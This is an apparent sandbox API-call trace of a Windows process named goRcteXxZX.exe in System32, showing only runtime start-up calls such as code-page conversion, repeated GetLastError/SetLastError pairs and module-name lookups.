lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x97å\x87õ\x94õ\x16", lpUsedDefaultChar=0x0) returned 256 [0031.940] GetLastError () returned 0x0 [0031.940] SetLastError (dwErrCode=0x0) [0031.940] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f45c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0031.940] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x16f45c, cbMultiByte=256, lpWideCharStr=0x16edb8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0031.940] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0031.940] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x16eba8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0031.940] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x16f25c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x97å\x87õ\x94õ\x16", lpUsedDefaultChar=0x0) returned 256 [0031.941] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1d9a8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.941] SetLastError (dwErrCode=0x0) [0031.941] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.942] SetLastError (dwErrCode=0x0) [0031.942] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.943] GetLastError () returned 0x0 [0031.943] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.944] GetLastError () returned 0x0 [0031.944] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.945] SetLastError (dwErrCode=0x0) [0031.945] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.946] GetLastError () returned 0x0 [0031.946] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.947] GetLastError () returned 0x0 [0031.947] SetLastError (dwErrCode=0x0) [0031.948] GetLastError () returned 0x0 [0031.948] SetLastError (dwErrCode=0x0) [0031.948] GetLastError () returned 0x0 [0031.948] SetLastError (dwErrCode=0x0) [0031.948] GetLastError () returned 0x0 [0031.948] SetLastError (dwErrCode=0x0) [0031.954] GetLastError () returned 0x0 [0031.954] SetLastError (dwErrCode=0x0) [0031.954] GetLastError () returned 0x0 [0031.954] SetLastError (dwErrCode=0x0) [0031.954] GetLastError () returned 0x0 [0031.954] SetLastError (dwErrCode=0x0) [0031.954] GetLastError () returned 0x0 [0031.954] SetLastError (dwErrCode=0x0) [0031.954] GetLastError () returned 0x0 [0031.954] SetLastError (dwErrCode=0x0) [0031.954] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.955] SetLastError (dwErrCode=0x0) [0031.955] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.956] SetLastError (dwErrCode=0x0) [0031.956] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.957] SetLastError (dwErrCode=0x0) [0031.957] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.958] SetLastError (dwErrCode=0x0) [0031.958] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.959] SetLastError (dwErrCode=0x0) [0031.959] GetLastError () returned 0x0 [0031.960] SetLastError (dwErrCode=0x0) [0031.960] GetLastError () returned 0x0 [0031.960] SetLastError (dwErrCode=0x0) [0031.960] GetLastError () returned 0x0 [0031.960] SetLastError (dwErrCode=0x0) [0031.960] GetLastError () returned 0x0 [0031.960] SetLastError (dwErrCode=0x0) [0031.960] GetLastError () returned 0x0 [0031.960] SetLastError (dwErrCode=0x0) [0031.960] GetLastError () returned 0x0 [0031.960] SetLastError (dwErrCode=0x0) [0031.960] GetLastError () returned 0x0 [0031.960] SetLastError (dwErrCode=0x0) [0031.960] GetLastError () returned 0x0 [0031.960] SetLastError (dwErrCode=0x0) [0031.961] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0031.961] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0031.961] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0031.961] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16f5d8 | out: lpSystemTimeAsFileTime=0x16f5d8*(dwLowDateTime=0xe0c50df0, dwHighDateTime=0x1d3dfba)) [0031.962] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f510, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.962] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x16f3f8, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 0x0 [0031.962] GetLastError () returned 